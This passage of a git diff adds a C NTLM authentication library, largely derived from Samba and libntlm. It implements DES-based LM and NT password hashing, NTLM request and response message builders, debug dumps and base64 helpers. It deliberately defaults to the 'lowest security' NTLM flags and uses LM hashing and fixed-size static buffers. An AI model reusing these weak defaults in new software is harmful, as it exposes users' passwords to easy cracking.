+}; + + +static uchar perm6[64] = { 40, 8, 48, 16, 56, 24, 64, 32, + 39, 7, 47, 15, 55, 23, 63, 31, + 38, 6, 46, 14, 54, 22, 62, 30, + 37, 5, 45, 13, 53, 21, 61, 29, + 36, 4, 44, 12, 52, 20, 60, 28, + 35, 3, 43, 11, 51, 19, 59, 27, + 34, 2, 42, 10, 50, 18, 58, 26, + 33, 1, 41, 9, 49, 17, 57, 25 +}; + + +static uchar sc[16] = { 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 }; + +static uchar sbox[8][4][16] = { + {{14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7}, + {0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8}, + {4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0}, + {15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13}}, + + {{15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10}, + {3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5}, + {0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15}, + {13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9}}, + + {{10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8}, + {13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1}, + {13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7}, + {1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12}}, + + {{7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15}, + {13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9}, + {10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4}, + {3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14}}, + + {{2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9}, + {14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6}, + {4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14}, + {11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3}}, + + {{12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11}, + {10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8}, + {9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6}, + {4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13}}, + + {{4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1}, + {13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6}, + {1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2}, + {6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12}}, + + {{13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7}, + {1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2}, + {7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8}, + {2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11}} +}; + +static void permute(char *out, char *in, uchar * p, int n) { + int i; + + for (i = 0; i < n; i++) + out[i] = in[p[i] - 1]; +} + +static void l_shift(char *d, int count, int n) { + char out[64]; + int i; + + for (i = 0; i < n; i++) + out[i] = d[(i + count) % n]; + for (i = 0; i < n; i++) + d[i] = out[i]; +} + +static void concat(char *out, char *in1, char *in2, int l1, int l2) { + while (l1--) + *out++ = *in1++; + while (l2--) + *out++ = *in2++; +} + +void xor(char *out, char *in1, char *in2, int n) { + int i; + + for (i = 0; i < n; i++) + out[i] = in1[i] ^ in2[i]; +} + +static void dohash(char *out, char *in, char *key, int forw) { + int i, j, k; + char pk1[56]; + char c[28]; + char d[28]; + char cd[56]; + char ki[16][48]; + char pd1[64]; + char l[32], r[32]; + char rl[64]; + + permute(pk1, key, perm1, 56); + + for (i = 0; i < 28; i++) + c[i] = pk1[i]; + for (i = 0; i < 28; i++) + d[i] = pk1[i + 28]; + + for (i = 0; i < 16; i++) { + l_shift(c, sc[i], 28); + l_shift(d, sc[i], 28); + + concat(cd, c, d, 28, 28); + permute(ki[i], cd, perm2, 48); + } + + permute(pd1, in, perm3, 64); + + for (j = 0; j < 32; j++) { + l[j] = pd1[j]; + r[j] = pd1[j + 32]; + } + + for (i = 0; i < 16; i++) { + char er[48]; + char erk[48]; + char b[8][6]; + char cb[32]; + char pcb[32]; + char r2[32]; + + permute(er, r, perm4, 48); + + xor(erk, er, ki[forw ? i : 15 - i], 48); + + for (j = 0; j < 8; j++) + for (k = 0; k < 6; k++) + b[j][k] = erk[j * 6 + k]; + + for (j = 0; j < 8; j++) { + int m, n; + + m = (b[j][0] << 1) | b[j][5]; + + n = (b[j][1] << 3) | (b[j][2] << 2) | (b[j][3] << 1) | b[j][4]; + + for (k = 0; k < 4; k++) + b[j][k] = (sbox[j][m][n] & (1 << (3 - k))) ? 1 : 0; + } + + for (j = 0; j < 8; j++) + for (k = 0; k < 4; k++) + cb[j * 4 + k] = b[j][k]; + permute(pcb, cb, perm5, 32); + + xor(r2, l, pcb, 32); + + for (j = 0; j < 32; j++) + l[j] = r[j]; + + for (j = 0; j < 32; j++) + r[j] = r2[j]; + } + + concat(rl, r, l, 32, 32); + + permute(out, rl, perm6, 64); +} + +static void str_to_key(unsigned char *str, unsigned char *key) { + int i; + + key[0] = str[0] >> 1; + key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2); + key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3); + key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4); + key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5); + key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6); + key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7); + key[7] = str[6] & 0x7F; + for (i = 0; i < 8; i++) { + key[i] = (key[i] << 1); + } +} + + +static void smbhash(unsigned char *out, unsigned char *in, unsigned char *key, int forw) { + int i; + char outb[64]; + char inb[64]; + char keyb[64]; + unsigned char key2[8]; + + str_to_key(key, key2); + + for (i = 0; i < 64; i++) { + inb[i] = (in[i / 8] & (1 << (7 - (i % 8)))) ? 1 : 0; + keyb[i] = (key2[i / 8] & (1 << (7 - (i % 8)))) ? 1 : 0; + outb[i] = 0; + } + + dohash(outb, inb, keyb, forw); + + for (i = 0; i < 8; i++) { + out[i] = 0; + } + + for (i = 0; i < 64; i++) { + if (outb[i]) + out[i / 8] |= (1 << (7 - (i % 8))); + } +} + +void E_P16(unsigned char *p14, unsigned char *p16) { + unsigned char sp8[8] = { 0x4b, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25 }; + smbhash(p16, sp8, p14, 1); + smbhash(p16 + 8, sp8, p14 + 7, 1); +} + +void E_P24(unsigned char *p21, unsigned char *c8, unsigned char *p24) { + smbhash(p24, c8, p21, 1); + smbhash(p24 + 8, c8, p21 + 7, 1); + smbhash(p24 + 16, c8, p21 + 14, 1); +} + +void D_P16(unsigned char *p14, unsigned char *in, unsigned char *out) { + smbhash(out, in, p14, 0); + smbhash(out + 8, in + 8, p14 + 7, 0); +} + +void E_old_pw_hash(unsigned char *p14, unsigned char *in, unsigned char *out) { + smbhash(out, in, p14, 1); + smbhash(out + 8, in + 8, p14 + 7, 1); +} + +void cred_hash1(unsigned char *out, unsigned char *in, unsigned char *key) { + unsigned char buf[8]; + + smbhash(buf, in, key, 1); + smbhash(out, buf, key + 9, 1); +} + +void cred_hash2(unsigned char *out, unsigned char *in, unsigned char *key) { + unsigned char buf[8]; + static unsigned char key2[8]; + + smbhash(buf, in, key, 1); + key2[0] = key[7]; + smbhash(out, buf, key2, 1); +} + +void cred_hash3(unsigned char *out, unsigned char *in, unsigned char *key, int forw) { + static unsigned char key2[8]; + + smbhash(out, in, key, forw); + key2[0] = key[7]; + smbhash(out + 8, in + 8, key2, forw); +} + +void SamOEMhash(unsigned char *data, unsigned char *key, int val) { + unsigned char s_box[256]; + unsigned char index_i = 0; + unsigned char index_j = 0; + unsigned char j = 0; + int ind; + + for (ind = 0; ind < 256; ind++) { + s_box[ind] = (unsigned char) ind; + } + + for (ind = 0; ind < 256; ind++) { + unsigned char tc; + + j += (s_box[ind] + key[ind % 16]); + + tc = s_box[ind]; + s_box[ind] = s_box[j]; + s_box[j] = tc; + } + for (ind = 0; ind < (val ? 516 : 16); ind++) { + unsigned char tc; + unsigned char t; + + index_i++; + index_j += s_box[index_i]; + + tc = s_box[index_i]; + s_box[index_i] = s_box[index_j]; + s_box[index_j] = tc; + + t = s_box[index_i] + s_box[index_j]; + data[ind] = data[ind] ^ s_box[t]; + } +} + +/* Samba encryption implementation*/ + + +/**************************************************************************** + Like strncpy but always null terminates. Make sure there is room! + The variable n should always be one less than the available size. +****************************************************************************/ + +char *StrnCpy(char *dest, const char *src, size_t n) { + char *d = dest; + + if (!dest) + return (NULL); + if (!src) { + *dest = 0; + return (dest); + } + while (n-- && (*d++ = *src++)); + *d = 0; + return (dest); +} + +size_t skip_multibyte_char(char c) { + return 0; +} + + +/******************************************************************* +safe string copy into a known length string. maxlength does not +include the terminating zero. +********************************************************************/ +#define DEBUG(a,b) ; +char *safe_strcpy(char *dest, const char *src, size_t maxlength) { + size_t len; + + if (!dest) { + DEBUG(0, ("Error: NULL dest in safe_strcpy\n")); + return NULL; + } + + if (!src) { + *dest = 0; + return dest; + } + + len = strlen(src); + + if (len > maxlength) { + DEBUG(0, ("Error: string overflow by %d in safe_strcpy [%.50s]\n", (int) (len - maxlength), src)); + len = maxlength; + } + + memcpy(dest, src, len); + dest[len] = 0; + return dest; +} + + +void strupper(char *s) { + while (*s) { + { + size_t skip = skip_multibyte_char(*s); + + if (skip != 0) + s += skip; + else { + if (islower((int) *s)) + *s = toupper((int) *s); + s++; + } + } + } +} + +extern void SMBOWFencrypt(uchar passwd[16], uchar * c8, uchar p24[24]); + +/* + This implements the X/Open SMB password encryption + It takes a password, a 8 byte "crypt key" and puts 24 bytes of + encrypted password into p24 + */ + +void SMBencrypt(uchar * passwd, uchar * c8, uchar * p24) { + uchar p14[15], p21[21]; + + memset(p21, '\0', 21); + memset(p14, '\0', 14); + StrnCpy((char *) p14, (char *) passwd, 14); + + strupper((char *) p14); + E_P16(p14, p21); + + SMBOWFencrypt(p21, c8, p24); + +#ifdef DEBUG_PASSWORD + DEBUG(100, ("SMBencrypt: lm#, challenge, response\n")); + dump_data(100, (char *) p21, 16); + dump_data(100, (char *) c8, 8); + dump_data(100, (char *) p24, 24); +#endif +} + +/* Routines for Windows NT MD4 Hash functions. */ +static int _my_wcslen(int16 * str) { + int len = 0; + + while (*str++ != 0) + len++; + return len; +} + +/* + * Convert a string into an NT UNICODE string. + * Note that regardless of processor type + * this must be in intel (little-endian) + * format. + */ + +static int _my_mbstowcs(int16 * dst, uchar * src, int len) { + int i; + int16 val; + + for (i = 0; i < len; i++) { + val = *src; + SSVAL(dst, 0, val); + dst++; + src++; + if (val == 0) + break; + } + return i; +} + +/* + * Creates the MD4 Hash of the users password in NT UNICODE. + */ + +void E_md4hash(uchar * passwd, uchar * p16) { + int len; + int16 wpwd[129]; + + /* Password cannot be longer than 128 characters */ + len = strlen((char *) passwd); + if (len > 128) + len = 128; + /* Password must be converted to NT unicode */ + _my_mbstowcs(wpwd, passwd, len); + wpwd[len] = 0; /* Ensure string is null terminated */ + /* Calculate length in bytes */ + len = _my_wcslen(wpwd) * sizeof(int16); + + mdfour(p16, (unsigned char *) wpwd, len); +} + +/* Does both the NT and LM owfs of a user's password */ +void nt_lm_owf_gen(char *pwd, uchar nt_p16[16], uchar p16[16]) { + char passwd[130]; + + memset(passwd, '\0', 130); + safe_strcpy(passwd, pwd, sizeof(passwd) - 1); + + /* Calculate the MD4 hash (NT compatible) of the password */ + memset(nt_p16, '\0', 16); + E_md4hash((uchar *) passwd, nt_p16); + +#ifdef DEBUG_PASSWORD + DEBUG(100, ("nt_lm_owf_gen: pwd, nt#\n")); + dump_data(120, passwd, strlen(passwd)); + dump_data(100, (char *) nt_p16, 16); +#endif + + /* Mangle the passwords into Lanman format */ + passwd[14] = '\0'; + strupper(passwd); + + /* Calculate the SMB (lanman) hash functions of the password */ + + memset(p16, '\0', 16); + E_P16((uchar *) passwd, (uchar *) p16); + +#ifdef DEBUG_PASSWORD + DEBUG(100, ("nt_lm_owf_gen: pwd, lm#\n")); + dump_data(120, passwd, strlen(passwd)); + dump_data(100, (char *) p16, 16); +#endif + /* clear out local copy of user's password (just being paranoid). */ + memset(passwd, '\0', sizeof(passwd)); +} + +/* Does the des encryption from the NT or LM MD4 hash. */ +void SMBOWFencrypt(uchar passwd[16], uchar * c8, uchar p24[24]) { + uchar p21[21]; + + memset(p21, '\0', 21); + + memcpy(p21, passwd, 16); + E_P24(p21, c8, p24); +} + +/* Does the des encryption from the FIRST 8 BYTES of the NT or LM MD4 hash. */ +void NTLMSSPOWFencrypt(uchar passwd[8], uchar * ntlmchalresp, uchar p24[24]) { + uchar p21[21]; + + memset(p21, '\0', 21); + memcpy(p21, passwd, 8); + memset(p21 + 8, 0xbd, 8); + + E_P24(p21, ntlmchalresp, p24); +#ifdef DEBUG_PASSWORD + DEBUG(100, ("NTLMSSPOWFencrypt: p21, c8, p24\n")); + dump_data(100, (char *) p21, 21); + dump_data(100, (char *) ntlmchalresp, 8); + dump_data(100, (char *) p24, 24); +#endif +} + + +/* Does the NT MD4 hash then des encryption. */ + +void SMBNTencrypt(uchar * passwd, uchar * c8, uchar * p24) { + uchar p21[21]; + + memset(p21, '\0', 21); + + E_md4hash(passwd, p21); + SMBOWFencrypt(p21, c8, p24); + +#ifdef DEBUG_PASSWORD + DEBUG(100, ("SMBNTencrypt: nt#, challenge, response\n")); + dump_data(100, (char *) p21, 16); + dump_data(100, (char *) c8, 8); + dump_data(100, (char *) p24, 24); +#endif +} + +#if 0 + +BOOL make_oem_passwd_hash(char data[516], const char *passwd, uchar old_pw_hash[16], BOOL unicode) { + int new_pw_len = strlen(passwd) * (unicode ? 2 : 1); + + if (new_pw_len > 512) { + DEBUG(0, ("make_oem_passwd_hash: new password is too long.\n")); + return False; + } + + /* + * Now setup the data area. + * We need to generate a random fill + * for this area to make it harder to + * decrypt. JRA. + */ + generate_random_buffer((unsigned char *) data, 516, False); + if (unicode) { + struni2(&data[512 - new_pw_len], passwd); + } else { + fstrcpy(&data[512 - new_pw_len], passwd); + } + SIVAL(data, 512, new_pw_len); + +#ifdef DEBUG_PASSWORD + DEBUG(100, ("make_oem_passwd_hash\n")); + dump_data(100, data, 516); +#endif + SamOEMhash((unsigned char *) data, (unsigned char *) old_pw_hash, True); + + return True; +} + +#endif + +/* libtnlm copyrigth was left here, anyway the interface was slightly modified */ + +/* included libntlm-3.2.9 (c) even if this code is based in 2.1 version*/ + +/* +Libntlm AUTHORS -- information about the authors +Copyright (C) 2002, 2003, 2004 Simon Josefsson +See the end for copying conditions. + +Grant Edwards +Original author of libntlm + +Andrew Tridgell +Wrote functions borrowed from SMB. + +Simon Josefsson +Build environment, maintainer. + +Frediano Ziglio +Contributed LGPL versions of some of the GPL'd Samba files. +*/ + +/* The [IS]VAL macros are to take care of byte order for non-Intel + * Machines -- I think this file is OK, but it hasn't been tested. + * The other files (the ones stolen from Samba) should be OK. + * I am not crazy about these macros -- they seem to have gotten + * a bit complex. A new scheme for handling string/buffer fields + * in the structures probably needs to be designed + */ + +#define AddBytes(ptr, header, buf, count) \ +{ \ +if (buf != NULL && count != 0) \ + { \ + SSVAL(&ptr->header.len,0,count); \ + SSVAL(&ptr->header.maxlen,0,count); \ + SIVAL(&ptr->header.offset,0,((ptr->buffer - ((uint8*)ptr)) + ptr->bufIndex)); \ + memcpy(ptr->buffer+ptr->bufIndex, buf, count); \ + ptr->bufIndex += count; \ + } \ +else \ + { \ + ptr->header.len = \ + ptr->header.maxlen = 0; \ + SIVAL(&ptr->header.offset,0,ptr->bufIndex); \ + } \ +} + +#define AddString(ptr, header, string) \ +{ \ +char *p = string; \ +int len = 0; \ +if (p) len = strlen(p); \ +AddBytes(ptr, header, ((unsigned char*)p), len); \ +} + +#define AddUnicodeString(ptr, header, string) \ +{ \ +char *p = string; \ +unsigned char *b = NULL; \ +int len = 0; \ +if (p) \ + { \ + len = strlen(p); \ + b = strToUnicode(p); \ + } \ +AddBytes(ptr, header, b, len*2); \ +} + + +#define GetUnicodeString(structPtr, header) \ +unicodeToString(((char*)structPtr) + IVAL(&structPtr->header.offset,0) , SVAL(&structPtr->header.len,0)/2) +#define GetString(structPtr, header) \ +toString((((char *)structPtr) + IVAL(&structPtr->header.offset,0)), SVAL(&structPtr->header.len,0)) +#define DumpBuffer(fp, structPtr, header) \ +dumpRaw(fp,((unsigned char*)structPtr)+IVAL(&structPtr->header.offset,0),SVAL(&structPtr->header.len,0)) + + +static void dumpRaw(FILE * fp, unsigned char *buf, size_t len) { + int i; + + for (i = 0; i < (signed int) len; ++i) + fprintf(fp, "%02x ", buf[i]); + + fprintf(fp, "\n"); +} + +static char *unicodeToString(char *p, size_t len) { + int i; + static char buf[1024]; + + assert(len + 1 < sizeof buf); + + for (i = 0; i < (signed int) len; ++i) { + buf[i] = *p & 0x7f; + p += 2; + } + + buf[i] = '\0'; + return buf; +} + +static unsigned char *strToUnicode(char *p) { + static unsigned char buf[1024]; + size_t l = strlen(p); + int i = 0; + + assert(l * 2 < sizeof buf); + + while (l--) { + buf[i++] = *p++; + buf[i++] = 0; + } + + return buf; +} + +static unsigned char *toString(char *p, size_t len) { + static unsigned char buf[1024]; + + assert(len + 1 < sizeof buf); + + memcpy(buf, p, len); + buf[len] = 0; + return buf; +} + + +void buildAuthRequest(tSmbNtlmAuthRequest * request, long flags, char *host, char *domain) { + char *h = NULL; //strdup(host); + char *p = NULL; //strchr(h,'@'); + +//TODO: review default flags + + if (host == NULL) + host = ""; + if (domain == NULL) + domain = ""; + + h = strdup(host); + p = strchr(h, '@'); + if (p) { + if (!domain) + domain = p + 1; + *p = '\0'; + } + if (flags == 0) + flags = 0x0000b207; /* Lowest security options to avoid negotiation */ + request->bufIndex = 0; + memcpy(request->ident, "NTLMSSP\0\0\0", 8); + SIVAL(&request->msgType, 0, 1); + SIVAL(&request->flags, 0, flags); + + assert(strlen(host) < 128); + AddString(request, host, h); + assert(strlen(domain) < 128); + AddString(request, domain, domain); + free(h); +} + +void buildAuthResponse(tSmbNtlmAuthChallenge * challenge, tSmbNtlmAuthResponse * response, long flags, char *user, char *password, char *domainname, char *host) { + uint8 lmRespData[24]; + uint8 ntRespData[24]; + char *u = strdup(user); + char *p = strchr(u, '@'); + char *w = NULL; + char *d = strdup(GetUnicodeString(challenge, uDomain)); + char *domain = d; + + if (domainname != NULL) + domain = domainname; + + if (host == NULL) + host = ""; + w = strdup(host); + + if (p) { + domain = p + 1; + *p = '\0'; + } + + SMBencrypt((unsigned char *) password, challenge->challengeData, lmRespData); + SMBNTencrypt((unsigned char *) password, challenge->challengeData, ntRespData); + + response->bufIndex = 0; + memcpy(response->ident, "NTLMSSP\0\0\0", 8); + SIVAL(&response->msgType, 0, 3); + + AddBytes(response, lmResponse, lmRespData, 24); + AddBytes(response, ntResponse, ntRespData, 24); + + assert(strlen(domain) < 128); + AddUnicodeString(response, uDomain, domain); + assert(strlen(u) < 128); + AddUnicodeString(response, uUser, u); + assert(strlen(w) < 128); + AddUnicodeString(response, uWks, w); + + AddString(response, sessionKey, NULL); + + if (flags != 0) + challenge->flags = flags; /* Overide flags! */ + response->flags = challenge->flags; + + if (d) + free(d); + if (u) + free(u); +} + + + + + +// info functions +void dumpAuthRequest(FILE * fp, tSmbNtlmAuthRequest * request); +void dumpAuthChallenge(FILE * fp, tSmbNtlmAuthChallenge * challenge); +void dumpAuthResponse(FILE * fp, tSmbNtlmAuthResponse * response); + +void dumpAuthRequest(FILE * fp, tSmbNtlmAuthRequest * request) { + fprintf(fp, "NTLM Request:\n"); + fprintf(fp, " Ident = %s\n", request->ident); + fprintf(fp, " mType = %d\n", IVAL(&request->msgType, 0)); + fprintf(fp, " Flags = %08x\n", IVAL(&request->flags, 0)); + fprintf(fp, " Host = %s\n", GetString(request, host)); + fprintf(fp, " Domain = %s\n", GetString(request, domain)); +} + +void dumpAuthChallenge(FILE * fp, tSmbNtlmAuthChallenge * challenge) { + fprintf(fp, "NTLM Challenge:\n"); + fprintf(fp, " Ident = %s\n", challenge->ident); + fprintf(fp, " mType = %d\n", IVAL(&challenge->msgType, 0)); + fprintf(fp, " Domain = %s\n", GetUnicodeString(challenge, uDomain)); + fprintf(fp, " Flags = %08x\n", IVAL(&challenge->flags, 0)); + fprintf(fp, " Challenge = "); + dumpRaw(fp, challenge->challengeData, 8); + fprintf(fp, " Uncomplete!! parse optional parameters\n"); +} + +void dumpAuthResponse(FILE * fp, tSmbNtlmAuthResponse * response) { + fprintf(fp, "NTLM Response:\n"); + fprintf(fp, " Ident = %s\n", response->ident); + fprintf(fp, " mType = %d\n", IVAL(&response->msgType, 0)); + fprintf(fp, " LmResp = "); + DumpBuffer(fp, response, lmResponse); + fprintf(fp, " NTResp = "); + DumpBuffer(fp, response, ntResponse); + fprintf(fp, " Domain = %s\n", GetUnicodeString(response, uDomain)); + fprintf(fp, " User = %s\n", GetUnicodeString(response, uUser)); + fprintf(fp, " Wks = %s\n", GetUnicodeString(response, uWks)); + fprintf(fp, " sKey = "); + DumpBuffer(fp, response, sessionKey); + fprintf(fp, " Flags = %08x\n", IVAL(&response->flags, 0)); +} + + + + + + + +/* + * base64.c -- base-64 conversion routines. + * + * For license terms, see the file COPYING in this directory. + * + * This base 64 encoding is defined in RFC2045 section 6.8, + * "Base64 Content-Transfer-Encoding", but lines must not be broken in the + * scheme used here. + */ + +/* + * This code borrowed from fetchmail sources + */ + + +static const char base64digits[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + +#define BAD -1 +static const char base64val[] = { + BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, + BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, + BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, BAD, 62, BAD, BAD, BAD, 63, + 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, BAD, BAD, BAD, BAD, BAD, BAD, + BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, + 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, BAD, BAD, BAD, BAD, BAD, + BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, + 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, BAD, BAD, BAD, BAD, BAD +}; + +#define DECODE64(c) (isascii(c) ? base64val[c] : BAD) + +void to64frombits(unsigned char *out, const unsigned char *in, int inlen) + +/* raw bytes in quasi-big-endian order to base 64 string (NUL-terminated) */ +{ + for (; inlen >= 3; inlen -= 3) { + *out++ = base64digits[in[0] >> 2]; + *out++ = base64digits[((in[0] << 4) & 0x30) | (in[1] >> 4)]; + *out++ = base64digits[((in[1] << 2) & 0x3c) | (in[2] >> 6)]; + *out++ = base64digits[in[2] & 0x3f]; + in += 3; + } + if (inlen > 0) { + unsigned char fragment; + + *out++ = base64digits[in[0] >> 2]; + fragment = (in[0] << 4) & 0x30; + if (inlen > 1) + fragment |= in[1] >> 4; + *out++ = base64digits[fragment]; + *out++ = (inlen < 2) ? '=' : base64digits[(in[1] << 2) & 0x3c]; + *out++ = '='; + } + *out = '\0'; +} + +int from64tobits(char *out, const char *in) + +/* base 64 to raw bytes in quasi-big-endian order, returning count of bytes */ +{ + int len = 0; + register unsigned char digit1, digit2, digit3, digit4; + + if (in[0] == '+' && in[1] == ' ') + in += 2; + if (*in == '\r') + return (0); + + do { + digit1 = in[0]; + if (DECODE64(digit1) == BAD) + return (-1); + digit2 = in[1]; + if (DECODE64(digit2) == BAD) + return (-1); + digit3 = in[2]; + if (digit3 != '=' && DECODE64(digit3) == BAD) + return (-1); + digit4 = in[3]; + if (digit4 != '=' && DECODE64(digit4) == BAD) + return (-1); + in += 4; + *out++ = (DECODE64(digit1) << 2) | (DECODE64(digit2) >> 4); + ++len; + if (digit3 != '=') { + *out++ = ((DECODE64(digit2) << 4) & 0xf0) | (DECODE64(digit3) >> 2); + ++len; + if (digit4 != '=') { + *out++ = ((DECODE64(digit3) << 6) & 0xc0) | DECODE64(digit4); + ++len; + } + } + } while (*in && *in != '\r' && digit4 != '='); + + return (len); +} + +/* base64.c ends here */ diff --git a/ntlm.h b/ntlm.h new file mode 100644 index 0000000..1a7db63 --- /dev/null +++ b/ntlm.h @@ -0,0 +1,146 @@ + +/* $Id$ + Single file NTLM system to create and parse authentication messages. + + http://www.reversing.org + ilo-- ilo@reversing.org + + I did copy&paste&modify several files to leave independent NTLM code + that compile in cygwin/linux environment. Most of the code was ripped + from Samba implementation so I left the Copying statement. Samba core + code was left unmodified from 1.9 version. + + Also libntlm was ripped but rewrote, due to fixed and useless interface. + Copyright and licensing information is in ntlm.c file. + + NTLM Interface, just two functions: + + void BuildAuthRequest(tSmbNtlmAuthRequest *request, long flags, char *host, char *domain); + if flags is 0 minimun security level is selected, otherwise new value superseeds. + host and domain are optional, they may be NULLed. + + void buildAuthResponse(tSmbNtlmAuthChallenge *challenge, tSmbNtlmAuthResponse *response, long flags, char *user, char *password, char *domain, char *host); + Given a challenge, generates a response for that user/passwd/host/domain. + flags, host, and domain superseeds given by server. Leave 0 and NULL for server authentication + + + This is an usage sample: + + + ... + //beware of fixed sized buffer, asserts may fail, don't use long strings :) + //Yes, I Know, year 2k6 and still with this shit.. + unsigned char buf[4096]; + unsigned char buf2[4096]; + + //send auth request: let the server send it's own hostname and domainname + buildAuthRequest((tSmbNtlmAuthRequest*)buf2,0,NULL,NULL); + to64frombits(buf, buf2, SmbLength((tSmbNtlmAuthRequest*)buf2)); + send_to_server(buf); + + //receive challenge + receive_from_server(buf); + + //build response with hostname and domainname from server + buildAuthResponse((tSmbNtlmAuthChallenge*)buf,(tSmbNtlmAuthResponse*)buf2,0,"username","password",NULL,NULL); + to64frombits(buf, buf2, SmbLength((tSmbNtlmAuthResponse*)buf2)); + send_to_server(buf); + + //get reply and Check if ok + ... + + + included bonus!!: + Base64 code + int from64tobits(char *out, const char *in); + void to64frombits(unsigned char *out, const unsigned char *in, int inlen); + + + + + You don't need to read the rest of the file. +*/ + + +/* + * These structures are byte-order dependant, and should not + * be manipulated except by the use of the routines provided + */ +typedef unsigned short uint16; +typedef unsigned int uint32; +typedef unsigned char uint8; + +typedef struct { + uint16 len; + uint16 maxlen; + uint32 offset; +} tSmbStrHeader; + +typedef struct { + char ident[8]; + uint32 msgType; + uint32 flags; + tSmbStrHeader host; + tSmbStrHeader domain; + uint8 buffer[1024]; + uint32 bufIndex; +} tSmbNtlmAuthRequest; + +typedef struct { + char ident[8]; + uint32 msgType; + tSmbStrHeader uDomain; + uint32 flags; + uint8 challengeData[8]; + uint8 reserved[8]; + tSmbStrHeader emptyString; + uint8 buffer[1024]; + uint32 bufIndex; +} tSmbNtlmAuthChallenge; + + +typedef struct { + char ident[8]; + uint32 msgType; + tSmbStrHeader lmResponse; + tSmbStrHeader ntResponse; + tSmbStrHeader uDomain; + tSmbStrHeader uUser; + tSmbStrHeader uWks; + tSmbStrHeader sessionKey; + uint32 flags; + uint8 buffer[1024]; + uint32 bufIndex; +} tSmbNtlmAuthResponse; + + +extern void buildAuthRequest(tSmbNtlmAuthRequest * request, long flags, char *host, char *domain); + +/* reversing interface */ + +/* ntlm functions */ +void BuildAuthRequest(tSmbNtlmAuthRequest * request, long flags, char *host, char *domain); + +// if flags is 0 minimun security level is selected, otherwise new value superseeds. +// host and domain are optional, they may be NULLed. + + +void buildAuthResponse(tSmbNtlmAuthChallenge * challenge, tSmbNtlmAuthResponse * response, long flags, char *user, char *password, char *domain, char *host); + +//Given a challenge, generates a response for that user/passwd/host/domain. +//flags, host, and domain superseeds given by server. Leave 0 and NULL for server authentication + +/* Base64 code*/ +int from64tobits(char *out, const char *in); +void to64frombits(unsigned char *out, const unsigned char *in, int inlen); + +void xor(char *out, char *in1, char *in2, int n); + +// info functions +void dumpAuthRequest(FILE * fp, tSmbNtlmAuthRequest * request); +void dumpAuthChallenge(FILE * fp, tSmbNtlmAuthChallenge * challenge); +void dumpAuthResponse(FILE * fp, tSmbNtlmAuthResponse * response); + +void strupper(char *s); + +#define SmbLength(ptr) (((ptr)->buffer - (uint8*)(ptr)) + (ptr)->bufIndex) diff --git a/performance.h b/performance.h new file mode 100644 index 0000000..ee070f6 --- /dev/null +++ b/performance.h @@ -0,0 +1,72 @@ +#include +#include +#include +#include +#include +#include +#include + +/* handles select errors */ +int my_select(int fd, fd_set * fdread, fd_set * 